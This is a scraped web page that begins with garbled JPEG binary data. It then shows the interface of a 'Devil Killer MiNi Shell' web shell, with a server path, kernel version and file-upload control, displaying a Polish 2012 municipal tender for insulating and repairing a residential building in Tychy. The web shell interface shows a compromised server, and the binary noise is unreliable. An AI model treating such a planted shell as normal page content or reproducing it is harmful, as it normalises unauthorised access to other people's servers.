JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121129/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121129/480768-N-2012.html

<p class="kh_header"><b>Tychy: TERMOMODERNIZACJA  NIERUCHOMOŚCI  STANOWIĄCEJ  WSPÓŁWŁASNOSĆ  GMINY, PRZY UL. BUDOWLANYCH 17-25</b><br>
<b>Numer ogłoszenia: 480768 - 2012; data zamieszczenia: 29.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:// bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> TERMOMODERNIZACJA  NIERUCHOMOŚCI  STANOWIĄCEJ  WSPÓŁWŁASNOSĆ  GMINY, PRZY UL. BUDOWLANYCH 17-25.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej wraz z wykonaniem 
      zaprojektowanych robót budowlanych w zakresie ocieplenia ścian zewnętrznych  budynku 
      mieszkalnego - wielorodzinnego Wspólnoty Mieszkaniowej Nr 22/V, położonego w Tychach 
      przy ul. Budowlanych 17-27,  dla zadania inwestycyjnego, pn.: Termomodernizacja 
      nieruchomości stanowiącej współwłasność gminy, przy ul. Budowlanych 17-25 - zgodnie z programem funkcjonalno użytkowym, stanowiącym załącznik nr 1 do projektu umowy.  


2.	 Zakres zamówienia obejmuje:  
       
1)   OPRACOWANIE DOKUMENTACJI  PROJEKTOWEJ  TERMOMODERNIZACJI BUDYNKU,
      PRZY UL BUDOWLANYCH 17- 25

ZAŁOŻENIA PROJEKTOWE:

-	uzyskanie decyzji o warunkach zabudowy, 
-	uzyskanie warunków technicznych,
-	uzyskanie map do celów projektowych,
-	opracowanie audytu energetycznego,
-	opracowanie dokumentacji projektowej (projekt architektoniczno budowlany + projekt wykonawczy)  wraz z uzyskaniem  pozwolenia na budowę dla planowanego zamierzenia inwestycyjnego w zakresie:
 	-  ocieplenia ścian zewnętrznych budynku,
 	-  wykonania podjazdu dla osób niepełnosprawnych do lokalu użytkowego, 
 	-  remontu istniejących kominów
       Szczegółowy zakres prac projektowych, który należy uwzględnić przy opracowaniu 
       dokumentacji projektowej został podany w programie funkcjonalno - użytkowym 
       w rozdziale III pkt. 2 ( wykonanie zaprojektowanych robót budowlanych) 
-	uzgodnienie dokumentacji projektowej ( Plastyk Miejski, Śląski Wojewódzki Konserwator Zabytków,  Rzeczoznawca do spraw zabezpieczeń przeciwpożarowych,
-	opracowanie specyfikacji technicznego wykonania i odbioru robót,
-	wykonanie przedmiarów robót wraz z kosztorysami;
-	wykonanie dokumentacji w 4 egzemplarzach + płyta CD  ( wersja elektroniczna                    w formacie PDF ),
-	materiały wskazane w projekcie winny posiadać deklaracje zgodności z Polską Normą lub Europejską Aprobatą Techniczną, 
-	zapewnienie sprawowania nadzoru autorskiego przez projektanta w okresie realizacji inwestycji,
-	zapewnienie nadzoru wybranego producenta systemu ocieplenia,
-	zapewnienie wykonania dokumentacji budowy w zakresie niezbędnym do zgłoszenia zakończenia robót budowlanych w Powiatowym Inspektoracie Nadzoru Budowlanego  w tym:
 	-  opracowanie dokumentacji powykonawczej,
 	-  sporządzenie geodezyjnego pomiaru powykonawczego,
 	-  opracowanie świadectwa charakterystyki energetycznej budynku,     

2)  WYKONANIE ZAPROJEKTOWANYCH ROBÓT BUDOWLANYCH:
    
      ZAKRES ROBÓT BUDOWLANYCH OBEJMUJE:

a)  OCIEPLENIE ŚCIAN ZEWNĘTRZNYCH:
-	 ocieplenie ścian zewnętrznych (grubość styropianu min 12cm), cokołu i gzymsu, ościeży
    okiennych i drzwiowych wraz z odtworzeniem istniejących detali architektonicznych 
    (ocieplana orientacyjna powierzchnia 2750m2 ) wraz z wyklejaniem podłoża w zakresie 
    niezbędnym do uzyskania jednorodnej, prostej  powierzchni ocieplenia,
-	 wykonanie warstwy fakturowej z silikatowej masy tynkarskiej do nakładania ręcznego  o  
    grubości ziarna 1,5mm z zastosowaniem kolorów otrzymanych z barwionej masy, 
-	 skucie i uzupełnienie głuchych tynków na elewacji, 
-	 remont balkonów - 24szt o wymiarach 1,60x0,80m obejmujący: skucie posadzki, wymianę
    obróbek blacharskich na blachę powlekaną, uzupełnienie ubytków w płytach, malowanie 
    balustrad i nadbudowanie do wysokości 110cm, wykonanie nowej warstwy wyrównawczej 
    wraz z ułożeniem płytek ceramicznych,
-	 demontaż istniejącego ocieplenia ściany szczytowej (drewniany ruszt + wełna + płyty
    azbestowe) o powierzchni: 190m2 ,
-	demontaż i ponowny montaż zadaszeń nad wejściami do klatki schodowej, 
-	 roboty malarskie zewnętrzne (w tym malowanie cokołu),
-	 wykonanie zabezpieczenia antygrafitti elewacji frontowej do wysokości pierwszego gzymsu 
    międzykondygnacyjnego (ok. 3m) ,
-	 wykonanie opaski ozdobnej wokół ościeży z płytek imitujących kamień ozdobny   
    nawiązujących wyglądem i fakturą od istniejącego wykończenia części elewacji z płytek w 
    lokalu użytkowym przy ul. Budowlanych 17 - 19,
-	 wymiana obróbek blacharskich: rynien - z blachy stalowej ocynkowanej - średnicy 200mm),
    rur spustowych - piony dł. 14m wraz z montażem zbiorniczków i czyszczaków 
    kanalizacyjnych z podłączeniem do istniejącej kanalizacji deszczowej), gzymsów z blachy 
    stalowej powlekanej wraz z wykonaniem warstwy spadkowej na gzymsach, parapetów z 
    blachy stalowej powlekanej , pasów nadrynnowych i pod rynnowych z blachy powlekanej  
    wraz z częściowym przełożeniem pokrycia dachowego w części niezbędnej do wymiany 
    pasa nadrynnowego, 
-	 zamurowanie okienek piwnicznych,
-	 wykonanie opaski żwirowej obwodowej wokół budynku o szerokości 80cm zakończonej
    obrzeżem betonowym 25x6x100cm z ułożeniem na gruncie geowłókniny,
-	 demontaż i ponowny montażu anten satelitarnych, skrzynek na reklamy, tablic z nazwami ulicy, krat itp.
-	 demontaż i montaż oświetlenia zewnętrznego wraz z osprzętem oraz paneli rozmownych 
    domofonowych wraz z przedłużeniem instalacji elektrycznej w zakresie niezbędny do 
    prawidłowego działania urządzeń,
-	 rozbiórka schodów zewnętrznych do lokalu użytkowego,
-	 wykonanie nowych schodów zewnętrznych o konstrukcji betonowej wraz z wykonaniem  
    fundamentu zagłębionego poniżej warstwy przemarzania (1,0m), 
-	 wykonanie posadzki schodów z lastryka płukanego, 
-	 montażu uchwytów na flagi -  5szt przy wejściach do klatek schodowych,
-	 montażu kratek wentylacyjnych podokiennych z blachy stalowej powlekanej,
-	 wyprowadzenie wentylacji piwnic z rur PCV 160 - 10szt ,
-	 wykonanie nazwy ulicy z numerem budynku ze styroduru - 2szt o wysokości mini 1m
-	 wykonanie zabezpieczeń wejść do klatek schodowych, wygrodzenie stref niebezpiecznych, 
    stosowanie foli zabezpieczających otwory okienne i drzwiowe) 
-	 wywóz i utylizacja gruzu,
-	 nawiezienie ziemi wraz z nasianiem trawy,
-	 wykonanie wszystkich niezbędnych prac, które towarzyszą niniejszemu zamówieniu

Uwaga:
W związku z tym , że istniejące pokrycie elewacji ściany szczytowej  zawiera azbest, wykonawca musi stosować się do zapisów:
-   Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004 r. w sprawie sposobów i warunków użytkowania i usuwania wyrobów zawierających azbest ( Dz. U. z 2004 r. Nr 71, poz. 649 z późn. zm.) , 
-  Rozporządzenia Ministra Infrastruktury z dnia 19 grudnia 2002 r. w sprawie zakresu i sposobu stosowania przepisów o przewozie drogowym towarów niebezpiecznych do transportu odpadów niebezpiecznych  ( Dz. U.  z  2002 r. Nr 236, poz. 1986).
     -   Rozporządzenia Ministra Środowiska z  dnia 8 grudnia 2010  w sprawie wzorów dokumentów             
      stosowanych na potrzeby ewidencji odpadów ( Dz. U. Nr 249, poz. 1673 )
b)   REMONT KOMINÓW:						
-	 otynkowanie istniejących kominów wraz z obłożeniem powierzchni kominów stalową siatką, 
-	 nałożenie  na kominach masy tynkarskiej użytej na elewacji kolor ciemniejszy.
-	 uzupełnienie ubytków cegieł w kominach,
-	 uzupełnienie czap kominowych wraz z montażem blach powlekanych na górnej powierzchni 
    czap,
-	 wymiana obróbek blacharskich przy kominach z blachy stalowej powlekanej wraz z 
    montażem listew maskujących, 
-	 sprawdzenie drożności przewodów kominowych (potwierdzone protokołem z przeglądu,
    wykonanego przez mistrza kominiarskiego),    
-	 wymiana ław kominiarskich na stalowe powlekane wraz ze zmianą sposobu mocowania  
    ław (należy uwzględnić przełożenie pokrycia z dachówki w części niezbędnej do wykonania 
    nowego mocowania oraz należy przewidzieć wymianę gąsiorów i dachówek w ilości 
     niezbędnej do odtworzenia połaci dachu),
 c)  WYKONANIE PODJAZDU DLA OSÓB NIEPEŁNOSPRAWNYCH: 
-	 Wykonanie według projektu wykonawczego podjazdu do lokalu użytkowego dla 
    niepełnosprawnych (podjazd o konstrukcji stalowej, powierzchnia podjazdu wykonana z 
    blachy stalowej pełnej, pochylnia winna być zakończona obustronnymi poręczami, równica 
    wysokości około 80cm - parametry techniczne winny być zgodne parametrami zawartymi w 
    obowiązujących warunkach technicznych)  

3.	Wymagania Zamawiającego dotyczące zamówienia:

 3.1. Opracowany projekt winien być sporządzony w oparciu o program funkcjonalno - użytkowy 
     stanowiący załącznik nr 1 do SIWZ oraz zgodnie z obowiązującymi przepisami, tj.:

-	Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 - tekst jednolity z późn. zm),

-	Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie z późn. zm. (Dz.U. z: 2002  Nr 75, poz. 690;  2003 r. Nr 33, poz. 270;  2004 r. Nr 109, poz. 1156;  2008 r. Nr 201, poz. 1238;  2008 r.  Nr 228, poz. 1514;  2009 r. Nr 56, poz. 461;  2010 r.  Nr 239, poz. 1597, 2012 r. Nr 0, poz. 1289),

-	Rozporządzeniem Ministra Transportu , Budownictwa i Gospodarki Morskiej  z dnia     25 kwietnia 2012 w sprawie szczegółowego zakresu i formy projektu budowlanego        ( Dz. U z 2012 r. Nr 0 , poz. 462 )
-	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego          z późn. zm. (Dz.U. z:  2004 r. Nr 202,  poz. 2072 ;  2005 r. Nr 75, poz. 664 ; 2010 r.          Nr 72, poz. 464 ;  2011 r. Nr 42,poz. 217 ;  2012 r.  Nr 0,poz. 365) 

-	Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno użytkowym (Dz. U. Nr 130, poz. 1389);

-	Rozporządzenie Ministra Infrastruktury z dnia 17 marca 2009 r. w sprawie szczegółowego zakresu i form audytu energetycznego oraz części audytu remontowego, wzorów kart audytów, a także algorytmu oceny opłacalności przedsięwzięcia termomodernizacyjnego (Dz. U. Nr 43 poz. 346 z późn. zm.),

-	Rozporządzenie Ministra Infrastruktury z dnia 6 listopada 2008 r. w sprawie metodologii obliczania charakterystyki energetycznej budynku i lokalu mieszkalnego lub części budynku stanowiącej samodzielną całość techniczno-użytkową oraz sposobu sporządzania i wzorów świadectw ich charakterystyki energetycznej (Dz.U. Nr 201, poz. 1240 z późn. zm.),
-	Polskimi Normami:
PN-EN ISO 6946:2008 	-    Komponenty budowlane i elementy budynku. Opór cieplny  
                                              i współczynnik przenikania ciepła. Metoda obliczania;
PN-EN ISO 14683:2008 	-    Mostki cieplne w budynkach. Liniowy współczynnik   
                                               przenikania ciepła. Metody uproszczone i wartości  
                                               orientacyjne;
PN-EN 12831:2006 	-    Instalacje ogrzewcze w budynkach. Metoda obliczania  
                                               projektowego obciążenia cieplnego
3.2.  Projekt ma uzyskać na etapie koncepcji pozytywną akceptację: Komisji ds. Estetyki 
        Przestrzeni Miejskiej Urzędu Miasta Tychy.
3.3.  W przedmiarze robót i w kosztorysie do materiałów pochodzących z rozbiórki należy
        przewidzieć wywóz, składowanie na składowisku odpadów i utylizację.
3.4.  Zamawiający wymaga przedłożenia do akceptacji rysunków wykonawczych 
        i szczegółowych specyfikacji technicznych wykonania i odbioru robót przed ich 
        skierowaniem do zatwierdzenia, w aspekcie ich zgodności z ustaleniami programu 
        funkcjonalno - użytkowego.
3.5.  Wykonawca sporządzi dokumentacje powykonawczą dla wykonania zrealizowanego 
        zadania.
3.6.  Roboty termomodernizacyjne będą wykonane zgodnie z zaproponowanym systemem 
        ocieplenia wskazanym w formularzu ofertowym i w projekcie budowlano - wykonawczym.

4.	UWAGA:
4.1. Na powyższy zakres zamówienia wybrany wykonawca w dniu podpisania umowy 
       przedstawi Zamawiającemu harmonogram rzeczowo - finansowy realizacji zadania 
       inwestycyjnego, pn.: TERMOMODERNIZACJA NIERUCHOMOŚCI STANOWIĄCEJ  
       WSPÓŁWŁASNOSĆ  GMINY, PRZY UL. BUDOWLANYCH 17-25  - wg wzoru druku 
      stanowiącego załącznik nr 2  do projektu umowy.
4.2. Wykonawca winien wskazać w formularzu ofertowym nazwę systemu, w jakim zostanie 
       wykonane ocieplenie ścian zewnętrznych budynku oraz zapewnić nadzór producenta 
       systemu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej 
 ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na zasadach 
 określonych w art. 67 ust.1. pkt. 6) ustawy - Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.21.20-8, 90.65.00.00-8, 45.32.00.00-6, 45.32.10.00-3, 45.44.30.00-4, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8, 45.26.13.20-3, 45.26.21.10-5, 45.11.12.20-6, 71.22.00.00-6, 79.21.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 15 000,00  zł  (słownie: piętnaście tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału w postępowaniu, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania (art. 22 ust. 1 pkt. 1 ustawy - PZP), Zamawiający wymaga złożenia następujących dokumentów:

1)	Decyzji dotyczącej  gospodarowania odpadami, wystawionej przez właściwego  Marszałka Województwa na podstawie ustawy o odpadach z dnia 27 kwietnia 2001 r. 
     ( Dz. U. z 2007 r. Nr 39 poz. 251 - tj. z późn.  zm.)  przynajmniej na: 
      17 06 01 - materiały izolacyjne zawierające azbest 

                  Decyzja musi być wystawiona na wykonawcę.
                 ( W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą 
                  spełniać łącznie  lub co najmniej jeden z wykonawców). 
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust. 1 pkt 2 ustawy - PZP), Zamawiający wymaga złożenia następujących dokumentów: 
wykazu robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, wartości, daty i miejsca wykonania,  w którym należy wykazać co najmniej:
-     dwie roboty budowlane o charakterze podobnym do przedmiotu zamówienia polegające na opracowaniu dokumentacji projektowej wraz ze zrealizowaniem zaprojektowanych robót budowlanych w zakresie wykonania ocieplenia ścian zewnętrznych w technologii lekkiej - mokrej w zaproponowanym w ofercie systemie ociepleniowym, o powierzchni wykonanego ocieplenia nie mniejszej niż 1 400 m2 każda,   o wartości każdej z tych robót nie mniejszej niż 275 000,00 zł (brutto) 
             lub
                -      jedną robotę budowlaną o charakterze podobnym do przedmiotu zamówienia 
                polegającą na opracowaniu dokumentacji projektowej wraz ze zrealizowaniem 
                zaprojektowanych robót budowlanych w zakresie wykonania ocieplenia ścian 
                zewnętrznych w technologii lekkiej - mokrej w zaproponowanym w ofercie  systemie              
                ociepleniowym o powierzchni wykonanego ocieplenia nie mniejszej niż 2 800 m2 
                i wartości nie mniejszej niż 550 000,00 zł (brutto)
    w zamieszkałych budynkach lub  w funkcjonujących budynkach użyteczności  
    publicznej.
    Do wykazu należy dołączyć dokumenty potwierdzające, że roboty wyszczególnione 
    w wykazie zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
                ukończone. 

               ( W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą 
                spełniać łącznie  lub co najmniej jeden z Wykonawców). 
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) Zamawiający wymaga złożenia następujących dokumentów:  
                 
1.	 wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, a w szczególności 
                   odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
                 budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia 
                 i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
                 przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
                   Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
                 a w szczególności:
a)	 co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania bez 
        ograniczeń w specjalności architektonicznej lub konstrukcyjno - budowlanej 
b)	co najmniej jedną osobą posiadającą uprawnienia do wykonywania audytów 
                  energetycznych,
c)	co najmniej jedną osobą posiadającą uprawnienia do wykonywania certyfikatów 
                  energetycznych,
d)	co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności 
                  konstrukcyjno - budowlanej bez ograniczeń (do kierowania robotami), która posiada 
                  co najmniej 3 lata doświadczenia w zakresie pełnienia funkcji kierownika robót,
e)	 co najmniej trzema osobami przeszkolonymi w zakresie technologii wykonywania 
                  systemu ociepleniowego ścian zewnętrznych zaproponowanego przez Wykonawcę w 
                  ofercie, posiadającymi co najmniej 1 rok doświadczenie (każda z tych osób) w zakresie 
                  prac ociepleniowych w zaproponowanym systemie. 

      (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą 
      spełniać łącznie lub co najmniej jeden z wykonawców). 
      Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik Nr 4 do SIWZ.

2)	oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają 
               wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania
                wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt. 4 ustawy - PZP), 
                Zamawiający wymaga, złożenia następujących dokumentów: 

1)	informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których 
                  wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków 
                  finansowych lub zdolność kredytową  wykonawcy na kwotę nie mniejszą
                  niż 500 000,00 zł  - wystawionej nie wcześniej niż 3 miesiące przed upływem terminu 
                  składania ofert,

2)	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że  
            Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
            działalności związanej z przedmiotem zamówienia - o wartości ubezpieczenia 
      nie mniejszej niż  550 000,00 zł ,
                  Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
                  musi wynikać z treści dokumentu.
                  Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca 
                  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
                  związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty
                  dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
                  opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).
    

         (W przypadku podmiotów występujących wspólnie ww. warunki udziału wykonawcy mogą spełniać  łącznie lub co najmniej jeden z wykonawców). 
                                                                 Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów 
                  dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, 
                  może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie  
                  opisanego przez Zamawiającego warunku (art. 26 ust. 2 c ustawy PZP).
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia</p>
</li></ul></li></ul>
